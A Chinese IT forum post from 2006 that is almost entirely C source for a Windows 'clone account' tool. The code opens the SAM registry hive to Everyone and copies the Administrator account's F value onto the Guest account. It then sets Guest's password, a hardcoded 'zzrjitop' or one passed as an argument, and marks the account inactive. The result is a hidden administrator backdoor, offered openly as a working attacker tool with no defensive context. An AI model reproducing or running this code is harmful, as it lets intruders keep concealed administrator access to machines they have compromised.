设为首页收藏本站

职业IT人-IT人生活圈

 找回密码
 成为会员
搜索
职业IT人-IT人生活圈»IT生活 软件工程师 C/C++ c语言简单实现克隆帐户
返回列表 发新帖
查看: 1786|回复: 0

c语言简单实现克隆帐户

[复制链接]
zlyuanna 发表于 2006-12-15 23:26 | 显示全部楼层 |阅读模式
c语言简单实现克隆帐户

#include <Windows.h>
#include <Aclapi.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
#pragma comment (lib,\"Advapi32.lib\")

#define MAX_KEY_LENGTH 255
#define MAX_VALUE_NAME 16383

DWORD user_flag = 0;

TCHAR cloneUser[1024];

void QueryKey(HKEY hKey);
void banner();

void text_color(WORD color)
{
HANDLE console = GetStdHandle(STD_OUTPUT_HANDLE);
SetConsoleTextAttribute(console, color);
}

int main(int argc, char **argv)
{
DWORD dwRet;
LPSTR SamName = _T(\"MACHINE\\SAM\\SAM\");
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pOldDacl = NULL;
PACL pNewDacl = NULL;
EXPLICIT_ACCESS ea;
HKEY hKey = NULL;
LPBYTE lpDataF=NULL;
HKEY cKey, uKey;
DWORD Type=REG_BINARY,SizeF=1024*2;
TCHAR command[1024];
TCHAR command1[1024];
int ret;

// 初始化变量
lpDataF = (LPBYTE) malloc(1024*2);
ZeroMemory(lpDataF,1024*2);


// 显示作者和相关信息
banner();

// 获取SAM主键的DACL
dwRet = GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, &pOldDacl, NULL, &pSD);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"Set Privilege (1) Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}

// 创建一个ACE,允许Everyone完全控制对象,并允许子对象继承此权限
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea, _T(\"Everyone\"), KEY_ALL_ACCESS, SET_ACCESS,
SUB_CONTAINERS_AND_OBJECTS_INHERIT);

// 将新的ACE加入DACL
dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"Set Privilege (2) Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}

// 更新SAM主键的DACL
dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDacl, NULL);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"Set Privilege (3) Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}

_tprintf(_T(\"[+]Set Privilege..\"));
text_color(10);
_tprintf(_T(\"[OK]\\n\"));
text_color(7);

// 枚举用户
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T(\"SAM\\SAM\\Domains\\Account\\Users\\Names\"),0, KEY_ALL_ACCESS,&uKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegOpenKeyEx Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}

// 功能函数实现自动判断用户
QueryKey(uKey);

if(user_flag == 0){
text_color(12);
_tprintf(_T(\"The guest user may be delete!\\n\"));
text_color(7);
exit(0);
}

// 打开SAM的子键 1F4
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T(\"SAM\\SAM\\Domains\\Account\\Users\\000001F4\"),
0, KEY_ALL_ACCESS, &hKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegOpenKeyEx Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}

// 获得 1F4 的 F 键值
dwRet = RegQueryValueEx(hKey, _T(\"F\"), NULL, &Type,lpDataF,&SizeF);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegQueryValueEx Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}


// 打开SAM的子键 1F5
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T(\"SAM\\SAM\\Domains\\Account\\Users\\000001F5\"),
0, KEY_ALL_ACCESS, &cKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegOpenKeyEx Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}

// clone
dwRet = RegSetValueEx(cKey,_T(\"F\"),0, REG_BINARY,lpDataF,SizeF);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegSetValueEx Error: %d\"), dwRet);
text_color(12);
_tprintf(_T(\"[Fail]\\n\"));
text_color(7);
goto FreeAndExit;
}
text_color(7);
_tprintf(_T(\"[+]Clone Successfully..\"));
text_color(10);
_tprintf(_T(\"[OK]\\n\"));
text_color(7);
_tprintf(_T(\"[+]Try to set user password..\"));
text_color(10);
_tprintf(_T(\"[OK]\\n\"));
text_color(7);

// 禁用用户, 改密码
if(argc == 1)
{


//执行 net user xx pass
_tcscpy(command,_T(\"net user \"));
_tcscat(command,cloneUser);
_tcscat(command, _T(\" \"));
_tcscat(command, \"zzrjitop\");
text_color(0);
ret = system(command);
if (ret != 0)
{
text_color(7);
_tprintf(_T(\"Set password fail..\\n\"));
text_color(12);
_tprintf(_T(\"\\nFail\\n\"));
text_color(7);
exit(5);
}


//执行 net user xx /active:no
_tcscpy(command1,_T(\"net user \"));
_tcscat(command1,cloneUser);
_tcscat(command1,_T(\" /active:no\"));
// _tprintf(command1);
text_color(0);
ret = system(command1);
if (ret != 0)
{
text_color(7);
_tprintf(_T(\"Set password fail..\\n\"));
text_color(12);
_tprintf(_T(\"\\nFail\\n\"));
text_color(7);
exit(5);
}
text_color(14);
_tprintf(_T(\"[+]User: %s Password: zzrjitop\\n\"), cloneUser);
text_color(7);

}

if(argc ==2)
{

_tcscpy(command,_T(\"net user \"));
_tcscat(command,cloneUser);
_tcscat(command, _T(\" \"));
_tcscat(command, argv[1]);
text_color(0);
ret = system(command);
if (ret != 0)
{
text_color(7);
_tprintf(_T(\"Set password fail..\\n\"));
text_color(12);
_tprintf(_T(\"\\nFail\\n\"));
text_color(7);
exit(5);
}
//_tprintf(\"%s\",command);

//执行 net user xx /active:no
_tcscpy(command1,_T(\"net user \"));
_tcscat(command1,cloneUser);
_tcscat(command1,_T(\" /active:no\"));
text_color(0);
ret = system(command1);
if (ret != 0)
{
text_color(7);
_tprintf(_T(\"Set password fail..\\n\"));
text_color(12);
_tprintf(_T(\"\\nFail\\n\"));
text_color(7);
exit(5);
}
text_color(14);
_tprintf(_T(\"[+]\\rUser: %s Password: %s\\n\"), cloneUser, argv[1]);
text_color(7);

}


goto FreeAndExit;


FreeAndExit:
if (hKey) RegCloseKey(hKey);
if (pNewDacl) LocalFree(pNewDacl);
// 还原SAM主键的DACL
if (pOldDacl) dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pOldDacl, NULL);
if (pSD) LocalFree(pSD);
return 0;
}

void QueryKey(HKEY hKey)
{
TCHAR achKey[MAX_KEY_LENGTH]; // buffer for subkey name
DWORD cbName; // size of name string
TCHAR achClass[MAX_PATH] = TEXT(\"\"); // buffer for class name
DWORD cchClassName = MAX_PATH; // size of class string
DWORD cSubKeys=0; // number of subkeys
DWORD cbMaxSubKey; // longest subkey size
DWORD cchMaxClass; // longest class string
DWORD cValues=0; // number of values for key
DWORD cchMaxValue; // longest value name
DWORD cbMaxValueData; // longest value data
DWORD cbSecurityDescriptor; // size of security descriptor
FILETIME ftLastWriteTime; // last write time
DWORD type = REG_BINARY, Size=1024*2;
LPBYTE lpData=NULL;

DWORD i, retCode;
HKEY tKey;

DWORD cchValue = MAX_VALUE_NAME;

TCHAR fulPath[] =_T(\"SAM\\SAM\\Domains\\Account\\Users\\Names\\\");
TCHAR temp[MAX_VALUE_NAME];
ZeroMemory(cloneUser,1024);

// Get the class name and the value count.
retCode = RegQueryInfoKey(
hKey, // key handle
achClass, // buffer for class name
&cchClassName, // size of class string
NULL, // reserved
&cSubKeys, // number of subkeys
&cbMaxSubKey, // longest subkey size
&cchMaxClass, // longest class string
&cValues, // number of values for this key
&cchMaxValue, // longest value name
&cbMaxValueData, // longest value data
&cbSecurityDescriptor, // security descriptor
&ftLastWriteTime); // last write time



// Enumerate the subkeys, until RegEnumKeyEx fails.

if (cSubKeys)
{
//printf( \"nNumber of subkeys: %dn\", cSubKeys);

for (i=0; i<cSubKeys; i++)
{
cbName = MAX_KEY_LENGTH;
retCode = RegEnumKeyEx(hKey, i,
achKey,
&cbName,
NULL,
NULL,
NULL,
&ftLastWriteTime);
if (retCode == ERROR_SUCCESS)
{
//_tprintf(TEXT(\"(%d) %s n\"), i+1, achKey);
ZeroMemory(temp,sizeof(temp));
_tcscpy(temp, fulPath);
_tcscat(temp,achKey);
//_tprintf(_T(\"%s n\"), temp);

retCode = RegOpenKeyEx(HKEY_LOCAL_MACHINE, temp, 0, KEY_ALL_ACCESS,&tKey);
if (retCode != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegOpenKeyEx Error: %d\"), retCode);
text_color(12);
_tprintf(_T(\"[Fail]n\"));
text_color(7);
exit(0);
}

lpData = (LPBYTE)malloc(2*1024);
ZeroMemory(lpData,2*1024);

retCode = RegQueryValueEx(tKey, NULL, NULL, &type, lpData,&Size);
if (retCode != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T(\"RegQueryValueEx Error: %d\"), retCode);
text_color(12);
_tprintf(_T(\"[Fail]n\"));
text_color(7);
if(tKey) RegCloseKey(tKey);
exit(1);
}

if(type==0x1f5) {
text_color(7);
_tprintf(_T(\"[+]Starting clone %s..\"), achKey);
text_color(10);
_tprintf(_T(\"[OK]n\"));
text_color(7);
_tcscpy(cloneUser,achKey);
user_flag = 1;
break;
}

}
}
}

// Enumerate the key values.
}


void banner(){
_tprintf(_T(\"******************************************************n\"));
_tprintf(_T(\"* Clone account Tooln\"));
_tprintf(_T(\"* Clone the 1F5 usern\"));
_tprintf(_T(\"* Usage: clone.exe or clone.exe passn\"));
_tprintf(_T(\"*\"));
text_color(12);
_tprintf(_T(\" If clone successfully it was made by zz[E.S.t]n\"));
text_color(7);
_tprintf(_T(\"******************************************************nn\"));

}
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 成为会员

本版积分规则

QQ|手机版|小黑屋|网站帮助|职业IT人-IT人生活圈 ( 粤ICP备12053935号-1 )|网站地图
本站文章版权归原发布者及原出处所有。内容为作者个人观点,并不代表本站赞同其观点和对其真实性负责,本站只提供参考并不构成任何投资及应用建议。本站是信息平台,网站上部分文章为转载,并不用于任何商业目的,我们已经尽可能的对作者和来源进行了通告,但是能力有限或疏忽造成漏登,请及时联系我们,我们将根据著作权人的要求立即更正或者删除有关内容。

GMT+8, 2024-4-29 18:22 , Processed in 0.116381 second(s), 20 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表